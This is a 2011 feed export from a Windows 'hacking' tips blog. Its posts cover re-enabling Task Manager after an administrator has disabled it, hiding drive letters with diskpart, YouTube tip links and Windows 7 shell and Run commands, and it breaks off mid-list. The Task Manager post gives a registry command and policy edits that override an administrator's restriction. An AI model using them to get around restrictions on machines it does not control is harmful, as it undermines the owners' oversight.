<?xml version='1.0' encoding='UTF-8'?><rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/" xmlns:blogger="http://schemas.google.com/blogger/2008" xmlns:georss="http://www.georss.org/georss" xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr="http://purl.org/syndication/thread/1.0" version="2.0"><channel><atom:id>tag:blogger.com,1999:blog-3606538285743323210</atom:id><lastBuildDate>Wed, 06 Nov 2024 03:00:13 +0000</lastBuildDate><category>Operating System</category><category>Tips and Tricks</category><category>Hacking</category><category>Networking</category><category>Windows</category><category>Entertainment</category><category>Mobile</category><category>Future Technologies</category><category>Linux</category><category>Tech Galleries</category><category>Video Galleries</category><title>PC Hacks | Learn How to Hack</title><description>Hacking tools tips and tricks for hacks,hardware,software,OS,Windows,XP,Vista,Linux,Troubleshooting,Computer Repair,Data Recovery,Online tools</description><link>http://pchackerz.blogspot.com/</link><managingEditor>noreply@blogger.com (paventhan)</managingEditor><generator>Blogger</generator><openSearch:totalResults>188</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3606538285743323210.post-7153097035484900676</guid><pubDate>Sat, 24 Sep 2011 05:18:00 +0000</pubDate><atom:updated>2011-09-23T22:18:22.530-07:00</atom:updated><title>Task Manager has been disabled by your administrator</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
This is only for educational purpose not any other means
&lt;span class=&quot;fullpost&quot;&gt;

&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;h4 style=&quot;background-color: white; font-family: Verdana; font-size: 13px; line-height: 19px; margin-bottom: 0px; margin-left: 10px; margin-right: 0px; margin-top: 1em;&quot;&gt;
Method 1&lt;/h4&gt;
&lt;div style=&quot;background-color: white; font-family: Verdana; font-size: 13px; line-height: 17px; margin-left: 10px;&quot;&gt;
Click Start, Run and type this command exactly as given below: (better - Copy and paste)&lt;/div&gt;
&lt;form action=&quot;http://windowsxp.mvps.org/_vti_bin/shtml.dll/Taskmanager_error.htm&quot; method=&quot;POST&quot; style=&quot;background-color: white; font-family: Verdana; font-size: 13px; line-height: 19px;&quot; target=&quot;_blank&quot; webbot-action=&quot;--WEBBOT-SELF--&quot;&gt;
&lt;div align=&quot;left&quot; style=&quot;line-height: 17px; margin-left: 10px;&quot;&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;input name=&quot;T1&quot; size=&quot;101&quot; style=&quot;border-bottom-color: rgb(0, 128, 128); border-bottom-style: solid; border-bottom-width: 1px; border-left-color: rgb(0, 128, 128); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(0, 128, 128); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(0, 128, 128); border-top-style: solid; border-top-width: 1px; font-family: Tahoma; font-size: 8pt;&quot; type=&quot;text&quot; value=&quot;REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f&quot; /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/form&gt;
&lt;h4 style=&quot;background-color: white; font-family: Verdana; font-size: 13px; line-height: 19px; margin-bottom: 0px; margin-left: 10px; margin-right: 0px; margin-top: 1em;&quot;&gt;
Method 2&lt;/h4&gt;
&lt;div style=&quot;background-color: white; font-family: Verdana; font-size: 13px; line-height: 17px; margin-left: 10px;&quot;&gt;
Download and run this&amp;nbsp;&lt;a href=&quot;http://windowsxp.mvps.org/reg/EnableTM.reg&quot; style=&quot;color: #003366;&quot; target=&quot;_blank&quot;&gt;REG&lt;/a&gt;&amp;nbsp;fix and double-click it.&lt;/div&gt;
&lt;h4 style=&quot;background-color: white; font-family: Verdana; font-size: 13px; line-height: 19px; margin-bottom: 0px; margin-left: 10px; margin-right: 0px; margin-top: 1em;&quot;&gt;
Method 3&lt;/h4&gt;
&lt;ul style=&quot;background-color: white; font-family: Verdana; font-size: 13px; line-height: 19px;&quot;&gt;
&lt;li style=&quot;font-size: 8pt; margin-left: 20px; margin-top: 5px; text-align: left;&quot;&gt;Click Start, Run and type&amp;nbsp;&lt;b&gt;Regedit.exe&lt;/b&gt;&lt;/li&gt;
&lt;li style=&quot;font-size: 8pt; margin-left: 20px; margin-top: 5px; text-align: left;&quot;&gt;Navigate to the following branch:&lt;/li&gt;
&lt;/ul&gt;
&lt;blockquote style=&quot;background-color: white; font-family: Verdana; font-size: 13px; line-height: 19px;&quot;&gt;
&lt;blockquote&gt;
&lt;div class=&quot;registry&quot; style=&quot;background-color: #eeeeee; color: #343434; font-family: Arial; font-size: 9pt; font-weight: bold; line-height: 16px; margin-left: 10px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;&quot;&gt;
HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies\ System&lt;/div&gt;
&lt;/blockquote&gt;
&lt;/blockquote&gt;
&lt;ul style=&quot;background-color: white; font-family: Verdana; font-size: 13px; line-height: 19px;&quot;&gt;
&lt;li style=&quot;font-size: 8pt; margin-left: 20px; margin-top: 5px; text-align: left;&quot;&gt;In the right-pane, delete the value named&amp;nbsp;&lt;b&gt;DisableTaskMgr&lt;/b&gt;&lt;/li&gt;
&lt;li style=&quot;font-size: 8pt; margin-left: 20px; margin-top: 5px; text-align: left;&quot;&gt;Close Regedit.exe&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 style=&quot;background-color: white; font-family: Verdana; font-size: 13px; line-height: 19px; margin-bottom: 0px; margin-left: 10px; margin-right: 0px; margin-top: 1em;&quot;&gt;
Method 4:&amp;nbsp; Using Group Policy Editor - for Windows XP Professional&lt;/h4&gt;
&lt;ul style=&quot;background-color: white; font-family: Verdana; font-size: 13px; line-height: 19px;&quot;&gt;
&lt;li style=&quot;font-size: 8pt; margin-left: 20px; margin-top: 5px; text-align: left;&quot;&gt;Click Start, Run, type&amp;nbsp;&lt;b&gt;gpedit.msc&lt;/b&gt;&amp;nbsp;and click OK.&lt;/li&gt;
&lt;li style=&quot;font-size: 8pt; margin-left: 20px; margin-top: 5px; text-align: left;&quot;&gt;Navigate to this branch:&lt;/li&gt;
&lt;/ul&gt;
&lt;blockquote style=&quot;background-color: white; font-family: Verdana; font-size: 13px; line-height: 19px;&quot;&gt;
&lt;blockquote&gt;
&lt;div class=&quot;registry&quot; style=&quot;background-color: #eeeeee; color: #343434; font-family: Arial; font-size: 9pt; font-weight: bold; line-height: 16px; margin-left: 10px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;&quot;&gt;
User Configuration / Administrative Templates / System / Ctrl+Alt+Delete Options / Remove Task Manager&lt;/div&gt;
&lt;/blockquote&gt;
&lt;/blockquote&gt;
&lt;ul style=&quot;background-color: white; font-family: Verdana; font-size: 13px; line-height: 19px;&quot;&gt;
&lt;li style=&quot;font-size: 8pt; margin-left: 20px; margin-top: 5px; text-align: left;&quot;&gt;Double-click the&amp;nbsp;&lt;b&gt;Remove Task Manager&lt;/b&gt;&amp;nbsp;option.&lt;/li&gt;
&lt;li style=&quot;font-size: 8pt; margin-left: 20px; margin-top: 5px; text-align: left;&quot;&gt;Set the policy to&amp;nbsp;&lt;b&gt;Not Configured&lt;/b&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
</description><link>http://pchackerz.blogspot.com/2011/09/task-manager-has-been-disabled-by-your.html</link><author>noreply@blogger.com (paventhan)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3606538285743323210.post-4179550781758948150</guid><pubDate>Sat, 24 Sep 2011 05:09:00 +0000</pubDate><atom:updated>2011-09-23T22:09:20.816-07:00</atom:updated><title>How to hide drive using command prompt?</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
This is only for educational purpose not any other means &lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;
Usually when you share your computer with different users, there is always a risk of personal data security. Normally you go with a choice to shift data on a removable drive like CD or USB stick, but you are helpless if your data is more than 100 GB in size. Then no removable drive or CD works. You may want to secure your personal/important data from any misuse or interruption. Here you can find easy trick with help of which you can hide full drive containing your personal data information using prompt command. This simple trick prevents your data to be accessed by unauthorized users. See the steps to do it:&lt;/div&gt;
&lt;br /&gt;To hide a drive:&lt;br /&gt;Click Start -&amp;gt; Run option.&lt;br /&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;
Type cmd in Run window and press Enter key or click Ok button. (It opens a prompt command on your screen within 5 seconds.)&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Type diskpart in command prompt against C:\Documents and Settings\Administrator&amp;gt; to display the DISKPART&amp;gt; session.&lt;/div&gt;
&lt;br /&gt;&lt;img src=&quot;http://softwaretutor.files.wordpress.com/2010/03/diskpart1.jpg?w=342&amp;amp;h=112&quot; /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;
Type list volume in command prompt against DISKPART&amp;gt;. (It will display drive information of your computer. It provides details of volume, letter that indicates a drive, label (if any) drive type and size it&amp;nbsp;captures.)&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;a href=&quot;http://softwaretutor.files.wordpress.com/2010/03/list-volume1.jpg&quot;&gt;&lt;img src=&quot;http://softwaretutor.files.wordpress.com/2010/03/list-volume1.jpg?w=544&amp;amp;h=141&quot; /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Select a volume, for instance, type select volume 2 and press Enter key. You will see a message that volume 2 is selected. (You need to select a drive by putting the volume number that indicates a specific drive. In this example, volume 0, volume 1, volume 2 and volume 3 indicate the drives F, C, D and E respectively.)&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;a href=&quot;http://softwaretutor.files.wordpress.com/2010/03/select-volume.jpg&quot;&gt;&lt;img src=&quot;http://softwaretutor.files.wordpress.com/2010/03/select-volume.jpg?w=252&amp;amp;h=105&quot; /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Now type remove letter D in command prompt against DISKPART&amp;gt; and press Enter key. It will show a message successfully removed the drive letter or mount type. (Note that volume 2 indicates the letter D in this case that means you are hiding drive D.)&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;a href=&quot;http://softwaretutor.files.wordpress.com/2010/03/hide_drive1.jpg&quot;&gt;&lt;img src=&quot;http://softwaretutor.files.wordpress.com/2010/03/hide_drive1.jpg?w=491&amp;amp;h=100&quot; /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Now open My Computer window, you will notice the drive d disappeared. Now restart your computer.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;To show drive again:&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
If you want to retrieve the drive again and show it on the list, follow the above steps till step 5.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Type assign letter D and click Enter key. Now restart your computer. Your hidden drive is rolled back.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
*Note:&lt;br /&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;
To make this setting, you need to be logged in to a computer with Administrator account and authorities; other user with less authority can not hide drive.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Make sure you are typing correct drive volume and respective letter for it.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Don’t forget to restart your computer when you have made and applied setting.&lt;/div&gt;
&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;
</description><link>http://pchackerz.blogspot.com/2011/09/how-to-hide-drive-using-command-prompt.html</link><author>noreply@blogger.com (paventhan)</author><thr:total>2</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3606538285743323210.post-6699025935792268434</guid><pubDate>Wed, 21 Sep 2011 07:09:00 +0000</pubDate><atom:updated>2011-09-21T00:09:06.461-07:00</atom:updated><title>You Tube Useful Hacking Videos Links</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
This is only for educational purpose not any other means&lt;br /&gt;
&lt;br /&gt;
&lt;h1 id=&quot;watch-headline-title&quot; style=&quot;background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #333333; font-family: arial, sans-serif; height: 1.1363em; line-height: 1.1363em; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; max-height: 1.1363em; overflow-x: hidden; overflow-y: hidden; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;
&lt;span class=&quot;&quot; dir=&quot;ltr&quot; id=&quot;eow-title&quot; style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot; title=&quot;Hacking Tip: Trace IP addresses to a location&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;Hacking Tip: Trace IP addresses to a location&lt;/span&gt;&lt;/span&gt;&lt;/h1&gt;
&lt;h1 id=&quot;watch-headline-title&quot; style=&quot;background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #333333; font-family: arial, sans-serif; height: 1.1363em; line-height: 1.1363em; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; max-height: 1.1363em; overflow-x: hidden; overflow-y: hidden; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;
&lt;a href=&quot;http://www.youtube.com/watch?v=OWNlEJfAaDY&quot; style=&quot;font-family: &#39;Times New Roman&#39;; font-size: medium; font-weight: normal; line-height: normal;&quot;&gt;http://www.youtube.com/watch?v=OWNlEJfAaDY&lt;/a&gt;&lt;/h1&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: arial, sans-serif; font-weight: bold; line-height: 36px;&quot;&gt;Hacking Tip: Hide Your IP Address&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div&gt;
&lt;span class=&quot;&quot; dir=&quot;ltr&quot; style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot; title=&quot;Hacking Tip: Hide Your IP Address&quot;&gt;&lt;a href=&quot;http://www.youtube.com/watch?v=FBpfrg3z0TI&amp;amp;feature=relmfu&quot;&gt;http://www.youtube.com/watch?v=FBpfrg3z0TI&amp;amp;feature=relmfu&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;h1 id=&quot;watch-headline-title&quot; style=&quot;background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #333333; font-family: arial, sans-serif; height: 1.1363em; line-height: 1.1363em; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; max-height: 1.1363em; overflow-x: hidden; overflow-y: hidden; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;
&lt;span class=&quot;&quot; dir=&quot;ltr&quot; id=&quot;eow-title&quot; style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot; title=&quot;Hack: Hide files inside pictures&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;Hack: Hide files inside pictures&lt;/span&gt;&lt;/span&gt;&lt;/h1&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;a href=&quot;http://www.youtube.com/watch?v=juFuEOxvZIM&amp;amp;feature=relmfu&quot;&gt;http://www.youtube.com/watch?v=juFuEOxvZIM&amp;amp;feature=relmfu&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;h1 id=&quot;watch-headline-title&quot; style=&quot;background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #333333; font-family: arial, sans-serif; height: 1.1363em; line-height: 1.1363em; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; max-height: 1.1363em; overflow-x: hidden; overflow-y: hidden; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;
&lt;span class=&quot;&quot; dir=&quot;ltr&quot; id=&quot;eow-title&quot; style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot; title=&quot;Cmd tricks that will blow your mind&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;Cmd tricks that will blow your mind&lt;/span&gt;&lt;/span&gt;&lt;/h1&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;a href=&quot;http://www.youtube.com/watch?v=7Joohx5t0JQ&amp;amp;feature=related&quot;&gt;http://www.youtube.com/watch?v=7Joohx5t0JQ&amp;amp;feature=related&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;h1 id=&quot;watch-headline-title&quot; style=&quot;background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #333333; font-family: arial, sans-serif; height: 1.1363em; line-height: 1.1363em; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; max-height: 1.1363em; overflow-x: hidden; overflow-y: hidden; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;
&lt;span class=&quot;&quot; dir=&quot;ltr&quot; id=&quot;eow-title&quot; style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot; title=&quot;Notepad Secret Trick&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;Notepad Secret Trick&lt;/span&gt;&lt;/span&gt;&lt;/h1&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;h1 id=&quot;watch-headline-title&quot; style=&quot;background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #333333; height: 1.1363em; line-height: 1.1363em; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; max-height: 1.1363em; overflow-x: hidden; overflow-y: hidden; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;
&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: small;&quot;&gt;&lt;a href=&quot;http://www.youtube.com/watch?v=P9XneY59wLM&amp;amp;feature=related&quot;&gt;http://www.youtube.com/watch?v=P9XneY59wLM&amp;amp;feature=related&lt;/a&gt;&lt;/span&gt;&lt;/h1&gt;
&lt;h1 id=&quot;watch-headline-title&quot; style=&quot;background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #333333; height: 1.1363em; line-height: 1.1363em; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; max-height: 1.1363em; overflow-x: hidden; overflow-y: hidden; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;
&lt;br /&gt;&lt;/h1&gt;
&lt;/div&gt;
&lt;/div&gt;
</description><link>http://pchackerz.blogspot.com/2011/09/you-tube-useful-hacking-videos-links.html</link><author>noreply@blogger.com (paventhan)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3606538285743323210.post-8496498126888146773</guid><pubDate>Thu, 08 Sep 2011 09:46:00 +0000</pubDate><atom:updated>2011-09-08T02:46:53.906-07:00</atom:updated><title>Windows 7 Commands Guide</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;This is only for educational purpose not any other means &lt;br /&gt;&lt;br /&gt;&lt;b&gt;Shell Commands&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;
These commands are especially useful to users, power users and administrators who need to gain access or create shortcuts to difficult-to-reach Windows 7 utilities or locations (such as folder for example).  There are two ways you can use these Shell Commands: To create a shortcuts or through Run…&lt;/div&gt;
&lt;br /&gt;&lt;b&gt;How to Create a Shortcut using a Shell Command.&lt;/b&gt;&lt;br /&gt;Right-click any empty space on your desktop.&lt;br /&gt;Click New.&lt;br /&gt;Click Shortcut.&lt;br /&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;
Now, if you want to create a shortcut, you will need to add “explorer.exe” , whiteout quotes,  right in front of each Shell command. Here is an example: explorer.exe shell:PicturesLibrary.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
So, right after clicking the shortcut link a new window will appear. In the blank field, write: shell:(your Command).&lt;/div&gt;
Click Next.&lt;br /&gt;Click OK.&lt;br /&gt;&lt;br /&gt;At this point you should see a shortcut icon on your desktop pointing to the the Picture Library.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;How to access folders using a Shell Command.&lt;/b&gt;&lt;br /&gt;Press the Windows Key + R on your keyboard.&lt;br /&gt;In the blank field, type Shell:(your command). This will let you access every folder in your Windows 7, including hidden folders.&lt;br /&gt;Click OK.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;List&lt;/b&gt;&lt;br /&gt;shell:AddNewProgramsFolder&lt;br /&gt;shell:Administrative Tools (hidden folder)&lt;br /&gt;shell:AppData (hidden to users)&lt;br /&gt;shell:AppUpdatesFolder (installed updates)&lt;br /&gt;shell:Cache (hidden folder) (Temporary Internet Files)&lt;br /&gt;shell:CD Burning (hidden folder)&lt;br /&gt;shell:ChangeRemoveProgramsFolder&lt;br /&gt;shell:Common Administrative Tools (hidden folder)&lt;br /&gt;shell:Common AppData (hidden folder)&lt;br /&gt;shell:Common Desktop&lt;br /&gt;shell:Common Documents&lt;br /&gt;shell:Common Programs (hidden folder)&lt;br /&gt;shell:Common Start Menu (hidden folder)&lt;br /&gt;shell:Common Startup (hidden folder)&lt;br /&gt;shell:Common Templates (hidden folder)&lt;br /&gt;shell:CommonDownloads&lt;br /&gt;shell:CommonMusic&lt;br /&gt;shell:CommonPictures&lt;br /&gt;shell:CommonRingtones (hidden folder)&lt;br /&gt;shell:CommonVideo&lt;br /&gt;shell:ConflictFolder&lt;br /&gt;shell:ConnectionsFolder&lt;br /&gt;shell:Contacts&lt;br /&gt;shell:ControlPanelFolder&lt;br /&gt;shell:Cookies&lt;br /&gt;shell:Cookies\Low (hidden folder)&lt;br /&gt;shell:CredentialManager (hidden folder)&lt;br /&gt;shell:CryptoKeys (hidden folder)&lt;br /&gt;shell:CSCFolder&lt;br /&gt;shell:Default Gadgets&lt;br /&gt;shell:Desktop&lt;br /&gt;shell:Device Metadata Store (hidden folder)&lt;br /&gt;shell:DocumentsLibrary&lt;br /&gt;shell:Downloads&lt;br /&gt;shell:DpapiKeys (hidden folder)&lt;br /&gt;shell:Favorites&lt;br /&gt;shell:Fonts&lt;br /&gt;shell:Gadgets (hidden folder)&lt;br /&gt;shell:Games&lt;br /&gt;shell:GameTasks (hidden folder)&lt;br /&gt;shell:History (hidden folder)&lt;br /&gt;shell:ImplicitAppShortcuts&lt;br /&gt;shell:InternetFolder (Internet Explorer)&lt;br /&gt;shell:Libraries&lt;br /&gt;shell:Links&lt;br /&gt;shell:Local AppData (hidden folder)&lt;br /&gt;shell:LocalAppDataLow (hidden folder)&lt;br /&gt;shell:LocalizedResourcesDir&lt;br /&gt;shell:MAPIFolder&lt;br /&gt;shell:MusicLibrary&lt;br /&gt;shell:My Music&lt;br /&gt;shell:My Pictures&lt;br /&gt;shell:My Video&lt;br /&gt;shell:MyComputerFolder&lt;br /&gt;shell:NetHood (hidden folder)&lt;br /&gt;shell:NetworkPlacesFolder&lt;br /&gt;shell:OEM Links&lt;br /&gt;shell:Original Images&lt;br /&gt;shell:OtherUsersFolder&lt;br /&gt;shell:Personal&lt;br /&gt;shell:PhotoAlbums&lt;br /&gt;shell:PicturesLibrary&lt;br /&gt;shell:Playlists&lt;br /&gt;shell:PrintersFolder&lt;br /&gt;shell:PrintHood (hidden folder)&lt;br /&gt;shell:Profile&lt;br /&gt;shell:ProgramFiles&lt;br /&gt;shell:ProgramFilesCommon&lt;br /&gt;shell:ProgramFilesCommonX86&lt;br /&gt;shell:ProgramFilesX86&lt;br /&gt;shell:Programs&lt;br /&gt;shell:Public&lt;br /&gt;shell:PublicGameTasks (hidden folder)&lt;br /&gt;shell:PublicSuggestedLocations&lt;br /&gt;shell:Quick Launch (hidden folder)&lt;br /&gt;shell:Recent (hidden folder)&lt;br /&gt;shell:RecycleBinFolder&lt;br /&gt;shell:ResourceDir&lt;br /&gt;shell:Ringtones (hidden folder)&lt;br /&gt;shell:SampleMusic&lt;br /&gt;shell:SamplePictures&lt;br /&gt;shell:SamplePlaylists&lt;br /&gt;shell:SampleVideos&lt;br /&gt;shell:SavedGames&lt;br /&gt;shell:Searches&lt;br /&gt;shell:SearchHomeFolder&lt;br /&gt;shell:SendTo (hidden folder)&lt;br /&gt;shell:Start Menu (hidden folder)&lt;br /&gt;shell:Startup&lt;br /&gt;shell:SyncCenterFolder&lt;br /&gt;shell:SyncResultsFolder&lt;br /&gt;shell:SyncSetupFolder&lt;br /&gt;shell:System&lt;br /&gt;shell:SystemCertificates (hidden folder)&lt;br /&gt;shell:SystemX86&lt;br /&gt;shell:Templates&lt;br /&gt;shell:TreePropertiesFolder&lt;br /&gt;shell:User Pinned&lt;br /&gt;shell:UserProfiles&lt;br /&gt;shell:UsersFilesFolder&lt;br /&gt;shell:UsersLibrariesFolder&lt;br /&gt;shell:VideosLibrary&lt;br /&gt;shell:Windows&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Run Commands&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;
Run Commands are quite useful if you want to reach, use, open anything in your Windows 7. What follows are the easy steps to use these commands.&lt;/div&gt;
&lt;br /&gt;&lt;b&gt;How to use Run Commands&lt;/b&gt;&lt;br /&gt;Press the Windows Key + R on your keyboard.&lt;br /&gt;Type the command in the blank field.&lt;br /&gt;Click OK.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;List&lt;/b&gt;&lt;br /&gt;Add/Remove Programs = appwiz.cpl&lt;br /&gt;Administrative Tools = control admintools&lt;br /&gt;Authorization Manager= azman.msc&lt;br /&gt;Calculator = calc&lt;br /&gt;Certificate Manager = certmgr.msc&lt;br /&gt;Character Map = charmap&lt;br /&gt;Check Disk Utility = chkdsk&lt;br /&gt;Command Prompt = cmd.exe&lt;br /&gt;Component Services = dcomcnfg&lt;br /&gt;Computer Management = compmgmt.msc&lt;br /&gt;Control Panel = control&lt;br /&gt;Date and Time Properties = timedate.cpl&lt;br /&gt;Defragment User Interface = dfrgui&lt;br /&gt;Device Manager = devmgmt.msc&lt;br /&gt;Direct X Troubleshooter = dxdiag&lt;br /&gt;Disk Cleanup Utility = cleanmgr&lt;br /&gt;Disk Management = diskmgmt.msc&lt;br /&gt;Disk Parmelonion Manager = diskpart&lt;br /&gt;Display Properties = control desktop or, alternatively desk.cpl&lt;br /&gt;Ditilizer Calibration Tool = 